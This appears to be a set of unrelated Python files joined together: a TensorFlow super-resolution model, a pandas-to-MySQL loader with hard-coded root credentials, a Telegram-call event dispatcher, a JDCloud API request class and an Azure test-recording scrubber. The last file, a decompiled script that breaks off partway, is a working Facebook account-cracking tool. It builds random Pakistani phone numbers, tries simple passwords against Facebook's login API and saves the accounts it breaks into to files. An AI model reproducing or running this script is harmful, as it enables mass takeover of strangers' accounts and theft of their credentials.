def conv2d(X, n_input, n_output, filter_size, activation=None, name=None, W=None, b=None):
    """Build a stride-1, SAME-padded 2-d convolution layer (TF1 graph mode).

    Passing existing *W*/*b* reuses those variables (used below to share
    weights across recursions); otherwise new ones are created inside the
    variable scope *name*.  Returns (output tensor, W, b).  When
    *activation* is None the bias is NOT added -- only the raw conv output
    is returned.
    """
    with tf.variable_scope(name):
        if W is None:
            W = tf.get_variable(
                name='W_1',
                shape=[filter_size[0], filter_size[1], n_input, n_output],
                initializer=tf.contrib.layers.xavier_initializer_conv2d())
        if b is None:
            b = tf.get_variable(
                name='b_1',
                shape=[n_output],
                initializer=tf.constant_initializer(0.))
        h = tf.nn.conv2d(X,
                         W,
                         strides=[1, 1, 1, 1],
                         padding='SAME'
                         )
        if activation != None:
            h = activation(tf.nn.bias_add(h, b))
        return h, W, b
class USRCNN(object):
    """Recursive super-resolution CNN (DRCN-style) built on TF1 graph mode.

    Fixed 41x41x3 patches; an embedding network feeds a weight-shared
    recursive inference layer whose per-recursion reconstructions are
    averaged (with a residual skip from the input) to form the output.
    """

    def __init__(self, sess):
        self.sess = sess
        # (height, width, channels) of every training/inference patch.
        self.shape = (41, 41, 3)
        # Normalization statistics, learned from the training targets.
        self.mean_img = None
        self.std_img = None
        self.min_loss = None
        self.build_model()
        sess.run(tf.global_variables_initializer())
        self.saver = tf.train.Saver()

    def load(self, sess, weights_path, meta_path):
        """Restore network weights and the pickled normalization metadata."""
        self.saver.restore(sess, weights_path)
        with open(meta_path, "rb") as f:
            meta = pickle.load(f)
        self.mean_img = meta['mean_img']
        self.std_img = meta['std_img']
        self.min_loss = meta['min_loss']

    def save(self, sess, weights_path, meta_path, min_loss, flag_export_graph=False, graph_path=None):
        """Persist normalization metadata (pickle) and checkpoint weights.

        NOTE(review): graph_path is accepted but unused -- confirm intent.
        """
        meta = {
            "mean_img": self.mean_img,
            "std_img": self.std_img,
            "shape": self.shape,
            "min_loss": min_loss
        }
        with open(meta_path, "wb") as f:
            pickle.dump(meta, f)
        self.saver.save(sess, weights_path, latest_filename="recent.ckpt", write_meta_graph=flag_export_graph)

    def build_model(self):
        """Assemble the embedding / recursive-inference / reconstruction graph."""
        height = self.shape[0]
        width = self.shape[1]
        channel = self.shape[2]
        X = tf.placeholder(tf.float32, shape=[None, height, width, channel], name='X')
        Y = tf.placeholder(tf.float32, shape=[None, height, width, channel], name='Y')
        start_learning_rate = tf.placeholder(tf.float32, name='learning_rate')
        global_step = tf.Variable(0, trainable=False)
        embeding_layer_info_list = [
            {'name': 'embed/conv_1',
             'n_input': 3,
             'n_output': 128,
             'filter_size': (3, 3),
             'activation': tf.nn.relu},
            {'name': 'embed/conv_2',
             'n_input': 128,
             'n_output': 128,
             'filter_size': (3, 3),
             'activation': tf.nn.relu},
        ]
        inference_layer_info = {'name': 'inference/conv_1',
                                'n_input': 128,
                                'n_output': 128,
                                'filter_size': (3, 3),
                                'activation': tf.nn.relu}
        reconstruction_layer_info = {'name': 'reconstruction/conv_1',
                                     'n_input': 128,
                                     'n_output': 3,
                                     'filter_size': (3, 3),
                                     'activation': None}
        current_input = X
        # embedding network
        for info in embeding_layer_info_list:
            current_input, _, _ = conv2d(X=current_input,
                                         n_input=info['n_input'],
                                         n_output=info['n_output'],
                                         filter_size=info['filter_size'],
                                         activation=info['activation'],
                                         name=info['name'],
                                         )
        # inference network: one conv applied recursively with SHARED W/b;
        # every recursion's output is kept for reconstruction.
        inference_layer_output_list = []
        info = inference_layer_info
        recursion = 9
        current_input, W, b = conv2d(X=current_input,
                                     n_input=info['n_input'],
                                     n_output=info['n_output'],
                                     filter_size=info['filter_size'],
                                     activation=info['activation'],
                                     name=info['name'] + '/first',
                                     )
        for i in range(recursion):
            current_input, _, _ = conv2d(X=current_input,
                                         n_input=info['n_input'],
                                         n_output=info['n_output'],
                                         filter_size=info['filter_size'],
                                         activation=info['activation'],
                                         name=info['name'] + '/' + str(i),
                                         W=W,
                                         b=b)
            inference_layer_output_list.append(current_input)
        # reconstruction network: each recursion depth gets its own local
        # reconstruction with a residual skip from X; they are averaged.
        local_output_list = []
        info = reconstruction_layer_info
        for i, inference in enumerate(inference_layer_output_list):
            local_output, _, _ = conv2d(X=inference,
                                        n_input=info['n_input'],
                                        n_output=info['n_output'],
                                        filter_size=info['filter_size'],
                                        activation=info['activation'],
                                        name=info['name'] + "/inference_{}".format(i), )
            local_output = tf.add(local_output, X)
            local_output_5d = tf.expand_dims(local_output, 0)
            local_output_list.append(local_output_5d)
        local_output_concat = tf.concat(local_output_list,0)
        print("local_output_concat shape : {}".format(local_output_concat.get_shape().as_list()))
        average_img = tf.reduce_mean(local_output_concat, axis=0, name='average_output')
        print("average_image shape : {}".format(average_img.get_shape().as_list()))
        Y_pred = average_img
        print("Y_pred shape : {}".format(Y_pred.get_shape().as_list()))
        print("Y shape : {}".format(Y.get_shape().as_list()))
        # Sum of squared errors per image, averaged over the batch.
        cost = tf.reduce_mean(tf.reduce_sum(tf.square(Y_pred - Y), axis=[1, 2, 3]), axis=0, name="reduce_mean_cost")
        learning_rate = tf.train.exponential_decay(start_learning_rate, global_step,
                                                   10000, 0.96, staircase=True)
        optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
        self.X = X
        self.Y = Y
        self.Y_pred = Y_pred
        self.cost = cost
        self.optimizer = optimizer
        self.start_learning_rate = start_learning_rate
        self.gloabal_step = global_step

    def train(self, X_train, Y_train, batch_size, n_epoch, start_learning_rate, save_dir_path, X_valid=None,
              Y_valid=None):
        """Mini-batch training loop with live matplotlib progress plots.

        Checkpoints to *save_dir_path* whenever the validation loss improves.
        Inputs are normalized with mean/std computed from Y_train on the
        first call (or restored by load()).
        """
        fig, axs = plt.subplots(1, 4, figsize=(20, 6))
        if self.min_loss is None:
            self.min_loss = 999999999
        # figure
        epoch_list = []
        loss_list = []
        if self.mean_img is None or self.std_img is None:
            self.mean_img = np.mean(Y_train, axis=0)
            self.std_img = np.std(Y_train, axis=0)
            print("make mean_img and std_img")
        height = self.shape[0]
        width = self.shape[1]
        channel = self.shape[2]
        test_img_source = (X_train, Y_train) if Y_valid is None else (X_valid, Y_valid)
        # NOTE(review): test_img_source is a 2-tuple, so len(...) == 2 and
        # randint(0, 2) picks an index in {0, 1, 2} -- probably meant
        # len(test_img_source[0]).  Confirm before changing.
        test_img_idx = random.randint(0, len(test_img_source))
        for epoch_i in range(n_epoch):
            print("epoh_i : {}".format(epoch_i))
            rand_idx_list = np.random.permutation(range(len(X_train)))
            n_batch = len(rand_idx_list) // batch_size
            for batch_i in range(n_batch):
                rand_idx = rand_idx_list[batch_i * batch_size: (batch_i + 1) * batch_size]
                batch_x = X_train[rand_idx]
                batch_y = Y_train[rand_idx]
                self.sess.run(self.optimizer,
                              feed_dict={self.X: (batch_x - self.mean_img) / self.std_img,
                                         self.Y: (batch_y - self.mean_img) / self.std_img,
                                         self.start_learning_rate: start_learning_rate})
            # Validation loss after each epoch drives checkpointing.
            loss = self.sess.run(self.cost, feed_dict={self.X: (X_valid - self.mean_img) / self.std_img,
                                                       self.Y: (Y_valid - self.mean_img) / self.std_img})
            print("loss : {}".format(loss))
            epoch_list.append(epoch_i)
            loss_list.append(loss)
            if loss < self.min_loss:
                self.min_loss = loss
                weights_path = "{}/weights".format(save_dir_path)
                meta_path = "{}/meta_data.pickle".format(save_dir_path)
                self.save(self.sess, weights_path=weights_path, meta_path=meta_path, min_loss=self.min_loss)
                print("-" * 30)
                print("Saved!")
                print("weights_path : {}".format(weights_path))
                print("meta_data_path : {}".format(meta_path))
                print("-" * 30)
            if epoch_i % 10 == 0:
                # Every 10 epochs show origin / query / reconstruction / loss.
                test_img_origin = test_img_source[1][test_img_idx]
                test_img_query = test_img_source[0][test_img_idx]
                test_img_recon = np.reshape(test_img_query, [-1, height, width, channel])
                test_img_recon = self.Y_pred.eval(feed_dict={self.X: (test_img_recon - self.mean_img) / self.std_img},
                                                  session=self.sess)
                test_img_recon = np.reshape(test_img_recon, [height, width, channel])
                # De-normalize and clamp back into displayable uint8 range.
                test_img_recon = test_img_recon * self.std_img + self.mean_img
                test_img_recon = np.clip(test_img_recon, 0, 255)
                test_img_recon = test_img_recon.astype(np.uint8)
                axs[0].imshow(test_img_origin)
                axs[0].set_title("origin")
                axs[1].imshow(test_img_query)
                axs[1].set_title("query")
                axs[2].imshow(test_img_recon)
                axs[2].set_title("reconstructed image_{}".format(epoch_i))
                axs[3].plot(epoch_list, loss_list)
                axs[3].set_xlabel("epoch_i")
                axs[3].set_ylabel("loss")
                axs[3].set_title("loss_{}".format(epoch_i))
                plt.pause(0.05)
        return self.sess

    def run(self, src):
        """Progressively enlarge *src*: enhance, then repeat (resize x1.2 +
        enhance) 8 times."""
        expand_ratio = 1.2
        times = 8
        target = src
        target = self.enhance_resolution(target)
        for i in range(times):
            shape = target.shape
            height_resize = round(shape[0] * expand_ratio)
            width_resize = round(shape[1] * expand_ratio)
            target = cv2.resize(target, (width_resize, height_resize))
            target = self.enhance_resolution(target)
        return target

    def enhance_resolution(self, src):
        """Run the network over *src* patch-by-patch and stitch the result.

        The image is tiled into 41x41 patches (zero-padded at the edges);
        each patch is normalized, reconstructed, de-normalized, and the
        mosaic is cropped back to the original size.
        """
        height = self.shape[0]
        width = self.shape[1]
        channel = self.shape[2]
        mean_img = self.mean_img
        std_img = self.std_img
        patch_list, shape = self.divide_img_to_patch(src, (width, height))
        patch_recon_list = []
        for patch in patch_list:
            patch_normalized = (patch - mean_img) / std_img
            patch_normalized = patch_normalized.reshape([1, height, width, channel])
            patch_recon = self.sess.run(self.Y_pred, feed_dict={self.X: patch_normalized})
            patch_recon = np.reshape(patch_recon, [height, width, channel])
            patch_recon = patch_recon * std_img + mean_img
            patch_recon = np.clip(patch_recon, 0, 255)
            patch_recon = patch_recon.astype(np.uint8)
            patch_recon_list.append(patch_recon)
        # Reassemble the row-major patch grid into a full image.
        row_list = []
        for row in range(shape[0]):
            col_list = []
            for col in range(shape[1]):
                col_list.append(patch_recon_list[row * shape[1] + col])
            row = np.concatenate(col_list, axis=1)
            row_list.append(row)
        recon_img = np.concatenate(row_list, axis=0)
        recon_img = recon_img[:src.shape[0], :src.shape[1]]
        return recon_img

    def divide_img_to_patch(self, src, size):
        """Tile *src* into non-overlapping (size[0] x size[1]) patches.

        The image is first placed on a zero background rounded up to a
        whole number of patches.  Returns (patch list in row-major order,
        (rows, cols) of the grid).
        """
        patch_list = []
        img_h = src.shape[0]
        img_w = src.shape[1]
        size_h = size[1]
        size_w = size[0]
        width_q = math.ceil(img_w / size_w)
        height_q = math.ceil(img_h / size_h)
        background = np.zeros(shape=(height_q * size_h, width_q * size_w, 3), dtype=src.dtype)
        background[:img_h, :img_w] = src
        src_with_background = background
        shape = (height_q, width_q)
        for h_i in range(height_q):
            for w_i in range(width_q):
                patch = src_with_background[h_i * size_h:(h_i + 1) * size_h, w_i * size_w: (w_i + 1) * size_w]
                patch_list.append(patch)
        return patch_list, shape
def run():
    """Load patches, split train/valid/test, and (re)train the USRCNN model."""
    height = 50
    width = 50
    channel = 3
    # NOTE(review): the module-level load_img_list_and_extract_patch_list
    # takes (dir_path, size, stride) -- this call omits the stride argument
    # and would raise TypeError as written.  Confirm the intended stride.
    img_list = load_img_list_and_extract_patch_list("./data/urban_hr", (width, height))
    X_all = np.array(blur_img_list(img_list, (width, height)))
    Y_all = np.array(img_list)
    # NOTE(review): these statistics are computed but unused here -- the
    # usrcnn.load(...) call below restores its own mean/std.
    mean_img = np.mean(Y_all, axis=0)
    std_img = np.std(Y_all, axis=0)
    # data
    # Shuffle, then split 80/10/10 into train/validation/test.
    rand_idx = np.random.permutation(range(len(X_all)))
    X_all = X_all[rand_idx]
    Y_all = Y_all[rand_idx]
    train_ratio = 0.8
    valid_ratio = 0.1
    test_ratio = 0.1
    data_num = len(X_all)
    train_data_num = round(data_num * train_ratio)
    valid_data_num = round(data_num * valid_ratio)
    test_data_num = round(data_num * test_ratio)
    X_train = X_all[:train_data_num]
    Y_train = Y_all[:train_data_num]
    X_valid = X_all[train_data_num:train_data_num + valid_data_num]
    Y_valid = Y_all[train_data_num:train_data_num + valid_data_num]
    X_test = X_all[train_data_num + valid_data_num:train_data_num + valid_data_num + test_data_num]
    Y_test = Y_all[train_data_num + valid_data_num:train_data_num + valid_data_num + test_data_num]
    sess = tf.Session()
    usrcnn = USRCNN(sess)
    # Resume from the last checkpoint, then continue training.
    usrcnn.load(sess, './model/weights', './model/meta_data.pickle')
    usrcnn.train(X_train, Y_train, X_valid=X_valid, Y_valid=Y_valid,
                 batch_size=64, n_epoch=3000, save_dir_path='./model')
    return usrcnn
def test():
    """Degrade one face image by 3x down/up-sampling and enhance it with the
    saved USRCNN checkpoint, showing the result with matplotlib."""
    def load_img_list_and_extract_patch_list(dir_path):
        # Local loader (shadows the module-level helper; takes no size/stride).
        images = []
        for name in os.listdir(dir_path):
            bgr = cv2.imread("{}/{}".format(dir_path, name))
            images.append(cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB))
        return images

    test_img = load_img_list_and_extract_patch_list("./data/celeba")[10]
    full_size = (test_img.shape[1], test_img.shape[0])
    # Shrink to a third, then blow back up: a blurry query image.
    test_img_resized = cv2.resize(test_img,
                                  (test_img.shape[1] // 3, test_img.shape[0] // 3),
                                  interpolation=cv2.INTER_CUBIC)
    test_img_resized = cv2.resize(test_img_resized, full_size,
                                  interpolation=cv2.INTER_CUBIC)
    with tf.Session() as sess:
        usrcnn = USRCNN(sess)
        usrcnn.load(sess, './model/weights', "./model/meta_data.pickle")
        result = usrcnn.enhance_resolution(test_img_resized)
        plt.imshow(result)
"""
def load_img_list_and_extract_patch_list(dir_path):
name_list = os.listdir(dir_path)
img_list = []
for name in name_list:
img_path = "{}/{}".format(dir_path, name)
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_list.append(img)
return img_list
test_img_list = load_img_list_and_extract_patch_list("./data/celeba")
test_img = test_img_list[10]
test_img_resized = cv2.resize(test_img, (test_img.shape[1]//3, test_img.shape[0]//3), interpolation = cv2.INTER_CUBIC)
test_img_resized = cv2.resize(test_img_resized, (test_img.shape[1],test_img.shape[0]), interpolation = cv2.INTER_CUBIC)
sess = tf.Session():
usrcnn = USRCNN(sess)
usrcnn.load(sess, './model/weights', "./model/meta_data.pickle")
result = usrcnn.enhance_resolution(test_img_resized)
plt.imshow(result)
"""
| StarcoderdataPython |
1980284 | # -*- coding: utf-8 -*-
# @Time: 2021/3/3 15:50
# @Author:Linyu
# @Software:PyCharm
import pandas as pd
from sqlalchemy import create_engine
import pymysql
# Read the Excel sheet of book records into a DataFrame.
# (pd.read_excel already returns a DataFrame for the default sheet_name,
# so the redundant pd.DataFrame(...) wrapper was dropped.)
excelFile = 'otherBook.xls'
df = pd.read_excel(excelFile)
# Write the records into MySQL, replacing any existing `otherBook` table.
# The connection charset is passed in the URL because create_engine's
# `encoding` keyword is deprecated and removed in SQLAlchemy 2.0.
# NOTE(review): credentials are hard-coded; move them to config/env vars.
engine = create_engine('mysql+pymysql://root:123456@localhost:3306/coreBooks?charset=utf8')
df.to_sql('otherBook', con=engine, if_exists='replace', index=False)
| StarcoderdataPython |
186829 | # tgcalls - a Python binding for C++ library by Telegram
# pytgcalls - a library connecting the Python binding with MTProto
# Copyright (C) 2020-2021 Il`ya (Marshal) <https://github.com/MarshalX>
#
# This file is part of tgcalls and pytgcalls.
#
# tgcalls and pytgcalls is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tgcalls and pytgcalls is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License v3
# along with tgcalls. If not, see <http://www.gnu.org/licenses/>.
import asyncio
import logging
from typing import Callable, List
from typing import TYPE_CHECKING
from ..exceptions import PytgcallsError
if TYPE_CHECKING:
from . import GroupCallNative
logger = logging.getLogger(__name__)
class Dispatcher:
    """Maps action names to lists of registered async handler callbacks.

    The set of valid action names is derived from the public attributes of
    the `available_actions` type passed to the constructor.
    """

    def __init__(self, available_actions: type):
        self.actions = available_actions
        self.__action_to_handlers = self.__build_handler_storage()

    def __build_handler_storage(self):
        """Return a dict with an empty handler list per public action name."""
        logger.debug('Build storage of handlers for dispatcher.')
        return {action: [] for action in dir(self.actions) if not action.startswith('_')}

    def add_handler(self, callback: Callable, action: str) -> Callable:
        """Register an async `callback` for `action` and return it.

        Raises PytgcallsError for a sync callback or an unknown action.
        Adding the same callback twice is a no-op.
        """
        logger.debug(f'Add handler to {action} action...')
        if not asyncio.iscoroutinefunction(callback):
            raise PytgcallsError('Sync callback does not supported')

        # Keep the try body minimal: only the dict lookup can raise KeyError.
        try:
            handlers = self.__action_to_handlers[action]
        except KeyError:
            raise PytgcallsError('Invalid action')

        if callback in handlers:
            logger.debug('Handler is already set.')
            return callback

        handlers.append(callback)
        logger.debug('Handler added.')
        return callback

    def remove_handler(self, callback: Callable, action: str) -> bool:
        """Unregister `callback` from `action`.

        Returns True if the callback was found and removed, False otherwise.
        Raises PytgcallsError for an unknown action.
        """
        logger.debug(f'Remove handler of {action} action...')
        try:
            handlers = self.__action_to_handlers[action]
        except KeyError:
            raise PytgcallsError('Invalid action')

        # list.remove drops the first equal element, matching the previous
        # hand-rolled index loop, and is the idiomatic form.
        try:
            handlers.remove(callback)
        except ValueError:
            return False
        return True

    def remove_all(self):
        """Drop every registered handler for every action."""
        self.__action_to_handlers = self.__build_handler_storage()

    def get_handlers(self, action: str) -> List[Callable]:
        """Return the handler list for `action` (raises on unknown action)."""
        logger.debug(f'Get {action} handlers...')
        try:
            return self.__action_to_handlers[action]
        except KeyError:
            raise PytgcallsError('Invalid action')

    def trigger_handlers(self, action: str, instance: 'GroupCallNative', *args, **kwargs):
        """Schedule every handler of `action` on the instance's event loop."""
        logger.debug(f'Trigger {action} handlers...')
        for handler in self.get_handlers(action):
            logger.debug(f'Trigger {handler.__name__}...')
            asyncio.ensure_future(handler(instance, *args, **kwargs), loop=instance.mtproto.get_event_loop())
| StarcoderdataPython |
220196 | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeMetricDataRequest(JDCloudRequest):
    """
    Query multiple metric data series of one resource.
    Metric reference: <a href="https://docs.jdcloud.com/cn/monitoring/metrics">Metrics</a>
    """

    def __init__(self, parameters, header=None, version="v1"):
        # Auto-generated request: GET /regions/{regionId}/metrics/{metric}/metricData
        super(DescribeMetricDataRequest, self).__init__(
            '/regions/{regionId}/metrics/{metric}/metricData', 'GET', header, version)
        self.parameters = parameters
class DescribeMetricDataParameters(object):
    # Parameter holder for DescribeMetricDataRequest; optional fields are
    # populated through the setter methods below.

    def __init__(self, regionId, metric, serviceCode, resourceId):
        """
        :param regionId: region id
        :param metric: metric identifier (id)
        :param serviceCode: resource type, e.g. vm, lb, ip, database
        :param resourceId: uuid of the resource
        """
        self.regionId = regionId
        self.metric = metric
        self.aggrType = None
        self.downSampleType = None
        self.startTime = None
        self.endTime = None
        self.timeInterval = None
        self.tags = None
        self.groupBy = None
        self.rate = None
        self.serviceCode = serviceCode
        self.resourceId = resourceId

    def setAggrType(self, aggrType):
        """
        :param aggrType: (Optional) aggregation method; defaults to downSampleType or avg.
            Allowed values: sum, avg, last, min, max
        """
        self.aggrType = aggrType

    def setDownSampleType(self, downSampleType):
        """
        :param downSampleType: (Optional) down-sampling method; defaults to aggrType or avg.
            Allowed values: sum, avg, last, min, max
        """
        self.downSampleType = downSampleType

    def setStartTime(self, startTime):
        """
        :param startTime: (Optional) start of the query range, UTC, format
            2016-12-11T00:00:00+0800 (note: '+' must be URL-encoded as %2B,
            i.e. 2016-12-11T00:00:00%2B0800 in a URL)
        """
        self.startTime = startTime

    def setEndTime(self, endTime):
        """
        :param endTime: (Optional) end of the query range, UTC, format
            2016-12-11T00:00:00+0800; when empty it is computed from
            startTime and timeInterval ('+' must be URL-encoded as %2B)
        """
        self.endTime = endTime

    def setTimeInterval(self, timeInterval):
        """
        :param timeInterval: (Optional) fixed interval: 1h, 6h, 12h, 1d, 3d, 7d, 14d;
            defaults to 1h (the hour before the current time)
        """
        self.timeInterval = timeInterval

    def setTags(self, tags):
        """
        :param tags: (Optional) dimension info of the metric data; used to
            filter metric data by different dimensions
        """
        self.tags = tags

    def setGroupBy(self, groupBy):
        """
        :param groupBy: (Optional) whether to group the queried tags
        """
        self.groupBy = groupBy

    def setRate(self, rate):
        """
        :param rate: (Optional) whether to compute a rate
        """
        self.rate = rate
| StarcoderdataPython |
3476142 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from azure.cli.testsdk.scenario_tests import RecordingProcessor
from azure.cli.testsdk.scenario_tests.utilities import is_text_payload
class CredentialReplacer(RecordingProcessor):
    """Recording processor that scrubs credentials from recorded traffic."""

    def recursive_hide(self, props):
        """Recursively replace sensitive values in *props* with 'hidden'.

        Dicts and lists are mutated in place; a string containing
        'password=' or 'key=' (case-insensitive) is replaced wholesale.
        Returns the (possibly replaced) value.
        """
        fake_content = 'hidden'
        sensitive_keys = ['secret']
        sensitive_data = ['password=', 'key=']
        if isinstance(props, dict):
            for key in props:
                if key in sensitive_keys:
                    props[key] = fake_content
                # Recurse even into just-hidden values; 'hidden' is inert.
                props[key] = self.recursive_hide(props[key])
        elif isinstance(props, list):
            for index, val in enumerate(props):
                props[index] = self.recursive_hide(val)
        elif isinstance(props, str):
            for data in sensitive_data:
                if data in props.lower():
                    props = fake_content
        return props

    def process_request(self, request):
        import json

        # Hide secrets in the request body.  Parse the JSON once — the
        # original parsed it twice (once in the condition, once for the
        # rewrite).  An empty/false-y payload is left untouched, as before.
        if is_text_payload(request) and request.body:
            body = json.loads(request.body)
            if body:
                request.body = json.dumps(self.recursive_hide(body))

        # Hide test tokens carried in headers.
        if 'x-ms-cupertino-test-token' in request.headers:
            request.headers['x-ms-cupertino-test-token'] = 'hidden'
        if 'x-ms-serviceconnector-user-token' in request.headers:
            request.headers['x-ms-serviceconnector-user-token'] = 'hidden'
        return request

    def process_response(self, response):
        import json

        if is_text_payload(response) and response['body']['string']:
            try:
                body = json.loads(response['body']['string'])
                body = self.recursive_hide(body)
                response['body']['string'] = json.dumps(body)
            except Exception:  # pylint: disable=broad-except
                # Deliberate best-effort: non-JSON bodies are left untouched.
                pass
        return response
| StarcoderdataPython |
1637380 | # Decompile by Mr. NIKI:)
# <NAME>
# Time Succes decompile : 2021-12-20 23:29:35.227070
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(30000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))
x += '\x1b[0m'
x = x.replace('!0', '\x1b[0m')
sys.stdout.write(x + '\n')
logo = '\n \x1b[1;97m RAKIB RAKIB RAKIB## \x1b[1;0m\n \x1b[1;91m RR KK II BB ++ ** \x1b[1;0m\n \x1b[1;97m RR AA KK IB \x1b[1;0m\n \x1b[1;91m GGGFFF FFFGGG RAKIB*** \x1b[1;0m\n \x1b[1;97m BO OS S SS \x1b[1;0m\n \x1b[1;91m BB RR AA KK II BB \x1b[1;0m\n \x1b[1;97m GGGFFF FFFGGG GGGGFFFF \x1b[1;0m\n\x1b[1;97m------------------------\x1b[1;97m------------------------\n\x1b[1;91m[!]\x1b[1;97m Author \x1b[1;97m : \x1b[1;97m Sarfraz Baloch\n\x1b[1;91m[!]\x1b[1;97m Facebook\x1b[1;97m: \x1b[1;97m Sarfraz Baloch\n\x1b[1;91m[!]\x1b[1;97m GitHub\x1b[1;97m : \x1b[1;97m Sarfraz-Baloch\n\x1b[1;91m[!]\x1b[1;97m Version\x1b[1;97m : \x1b[1;97m 4.0.1\n\x1b[1;97m------------------------\x1b[1;97m------------------------\n '
logo1 = ' \n\n\x1b[4;97mSELECT PAK SIM CODE \x1b[1;0m\n\x1b[1;97m[1] Jazz \x1b[1;97m 00,01,02,03,04,05,06,07,08\n\x1b[1;97m[2] Zong \x1b[1;97m 11,12,13,14,15,16,17\n\x1b[1;97m[3] Warid \x1b[1;97m 21,22,23,24,25\n\x1b[1;97m[4] Ufone \x1b[1;97m 30,31,32,33,34,35\n\x1b[1;97m[3] Telenor \x1b[1;97m 40,41,42,43,44,45,46,47\n\n\n\n\x1bx \x1b[1;97m\x1b[1;0m\n'
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
os.system('clear')
print logo
print '\x1b[1;97m-----------------------------------------------------'
print
print '\x1b[1;97m[1] START Random Number Cloning '
print
print '\x1b[1;97m-----------------------------------------------------'
action()
def action():
global cpb
global oks
ss = raw_input('\x1b[1;97m>>>> ')
if ss == '':
print '[!] Warning'
action()
elif ss == '1':
os.system('clear')
print logo
print logo1
try:
c = raw_input('\x1b[1;97mCODE : ')
k = '03'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
menu()
elif ss == '0':
menu()
else:
print '[!] Select valid option'
action()
os.system('clear')
print logo
print '\x1b[1;91m Use flight (airplane) mode before use'
print '\x1b[1;97m-----------------------------------------------------'
sss = str(len(id))
print '\x1b[1;97m TOTAL IDS :\x1b[1;92m ' + sss
print '\x1b[1;97m-----------------------------------------------------'
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass1
okb = open('save/SsCP.txt', 'a')
okb.write(k + c + user + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass1
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass2
okb = open('save/SS.OK.txt', 'a')
okb.write(k + c + user + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass2
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_CP] ' + k + c + user + ' | ' + pass3
okb = open('save/SSCP.txt', 'a')
okb.write(k + c + user + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass3
cps = open('save/SSCP.txt', 'a')
